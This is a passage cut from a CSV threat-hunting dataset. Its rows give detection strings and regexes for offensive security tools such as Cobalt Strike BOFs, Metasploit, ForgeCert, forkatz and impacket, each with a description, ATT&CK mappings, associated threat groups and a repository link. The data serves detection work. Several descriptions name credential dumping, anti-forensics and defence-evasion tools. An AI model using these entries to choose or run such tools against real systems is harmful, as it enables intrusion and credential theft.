Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","N/A","10","10","100","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z","45212"
"*foreign_lsass.x86*",".{0,1000}foreign_lsass\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","N/A","10","10","100","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z","45213"
"*Forensia.exe -D *",".{0,1000}Forensia\.exe\s\-D\s.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","45214"
"*forge_ticket.rb*",".{0,1000}forge_ticket\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","45216"
"*forge_ticket_spec.rb*",".{0,1000}forge_ticket_spec\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","45217"
"*ForgeCert.exe*",".{0,1000}ForgeCert\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","45218"
"*ForgeCert-main*",".{0,1000}ForgeCert\-main.{0,1000}","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001 - T1649","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","1","N/A","N/A","10","7","671","109","2024-08-17T16:40:07Z","2021-06-09T22:04:18Z","45219"
"*Forging a token from a fake Network Authentication through Datagram Contexts*",".{0,1000}Forging\sa\stoken\sfrom\sa\sfake\sNetwork\sAuthentication\sthrough\sDatagram\sContexts.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","N/A","10","5","433","56","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z","45220"
"*forkatz.exe*",".{0,1000}forkatz\.exe.{0,1000}","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","N/A","10","2","124","16","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z","45221"
"*forkatz.sln*",".{0,1000}forkatz\.sln.{0,1000}","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","N/A","10","2","124","16","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z","45222"
"*forkatz.vcxproj*",".{0,1000}forkatz\.vcxproj.{0,1000}","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","N/A","10","2","124","16","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z","45223"
"*forkatz-main*",".{0,1000}forkatz\-main.{0,1000}","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","N/A","10","2","124","16","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z","45224"
"*ForkDump-x64.exe*",".{0,1000}ForkDump\-x64\.exe.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","45225"
"*ForkDump-x64.pdb*",".{0,1000}ForkDump\-x64\.pdb.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","45226"
"*ForkDump-x86.exe*",".{0,1000}ForkDump\-x86\.exe.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","45227"
"*ForkDump-x86.pdb*",".{0,1000}ForkDump\-x86\.pdb.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","45228"
"*ForkPlayground-master*",".{0,1000}ForkPlayground\-master.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","45229"
"*Format SSSD Raw Kerberos Payloads into CCACHE files.*",".{0,1000}Format\sSSSD\sRaw\sKerberos\sPayloads\sinto\sCCACHE\sfiles\..{0,1000}","offensive_tool_keyword","KCMTicketFormatter","Format SSSD Raw Kerberos Payloads into CCACHE files for use on Windows systems","T1558.003 - T1550.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/blacklanternsecurity/KCMTicketFormatter","1","0","N/A","N/A","7","1","37","4","2021-05-26T20:23:56Z","2021-05-26T20:17:33Z","45230"
"*-format=dotnet-createsection -sleep*",".{0,1000}\-format\=dotnet\-createsection\s\-sleep.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","45231"
"*--format-string ziiiiizzzb * ",".{0,1000}\-\-format\-string\sziiiiizzzb\s.{0,1000}\s","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","N/A","10","10","657","130","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z","45232"
"*--format-string ziiiiizzzib *",".{0,1000}\-\-format\-string\sziiiiizzzib\s.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","N/A","10","10","657","130","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z","45233"
"*fortalice/bofhound*",".{0,1000}fortalice\/bofhound.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","45234"
"*fortra/CVE-2024-6768*",".{0,1000}fortra\/CVE\-2024\-6768.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","1","N/A","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","45235"
"*fortra/impacket*",".{0,1000}fortra\/impacket.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","45236"
"*fortra/No-Consolation*",".{0,1000}fortra\/No\-Consolation.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/fortra/No-Consolation","1","1","N/A","N/A","9","6","593","68","2024-10-23T16:25:21Z","2023-11-06T22:01:42Z","45237"
"*FortyNorthSecurity/CIMplant*",".{0,1000}FortyNorthSecurity\/CIMplant.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","1","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","45238"
"*FortyNorthSecurity/FunctionalC2*",".{0,1000}FortyNorthSecurity\/FunctionalC2.{0,1000}","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","1","N/A","N/A","10","10","74","17","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z","45239"
"*Forwards WebAuthn assertion requests to a compromised host running the Shwmae Windows Hello abuse tool*",".{0,1000}Forwards\sWebAuthn\sassertion\srequests\sto\sa\scompromised\shost\srunning\sthe\sShwmae\sWindows\sHello\sabuse\stool.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003  - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","45240"
"*Found a sideloaded DLL, assuming injection already performed*",".{0,1000}Found\sa\ssideloaded\sDLL,\sassuming\sinjection\salready\sperformed.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","45241"
"*found-passwords.txt*",".{0,1000}found\-passwords\.txt.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","45242"
"*FourEye(shellcode_bypass*",".{0,1000}FourEye\(shellcode_bypass.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","N/A","10","8","758","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z","45243"
"*FourEye-main*",".{0,1000}FourEye\-main.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","N/A","10","8","758","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z","45244"
"*foxglovesec/Potato*",".{0,1000}foxglovesec\/Potato.{0,1000}","offensive_tool_keyword","potato","Potato Privilege Escalation on Windows","T1134.001 - T1068  - T1055 - T1546.015","TA0004","N/A","N/A","Privilege Escalation","https://github.com/foxglovesec/Potato","1","1","N/A","N/A","7","8","721","165","2021-01-16T20:34:04Z","2016-02-09T11:28:17Z","45245"
"*fox-it/adconnectdump*",".{0,1000}fox\-it\/adconnectdump.{0,1000}","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","N/A","10","7","668","88","2024-11-10T22:00:16Z","2019-04-09T07:41:42Z","45246"
"*fox-it/BloodHound*",".{0,1000}fox\-it\/BloodHound.{0,1000}","offensive_tool_keyword","BloodHound","A Python based ingestor for BloodHound","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","1","N/A","N/A","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","45247"
"*foxlox/hypobrychium*",".{0,1000}foxlox\/hypobrychium.{0,1000}","offensive_tool_keyword","hypobrychium","hypobrychium AV/EDR Bypass","T1562.001 - T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/foxlox/hypobrychium","1","1","N/A","N/A","8","1","72","21","2023-07-21T21:13:20Z","2023-07-18T09:55:07Z","45248"
"*fpc -c Seatbelt*",".{0,1000}fpc\s\-c\sSeatbelt.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","45249"
"*FrameManagementAssociationRequest.py*",".{0,1000}FrameManagementAssociationRequest\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","45250"
"*FrameManagementDeauthentication.py*",".{0,1000}FrameManagementDeauthentication\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","45251"
"*FrameManagementProbeRequest.py*",".{0,1000}FrameManagementProbeRequest\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","45252"
"*FrameManagementReassociationResponse.py*",".{0,1000}FrameManagementReassociationResponse\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral 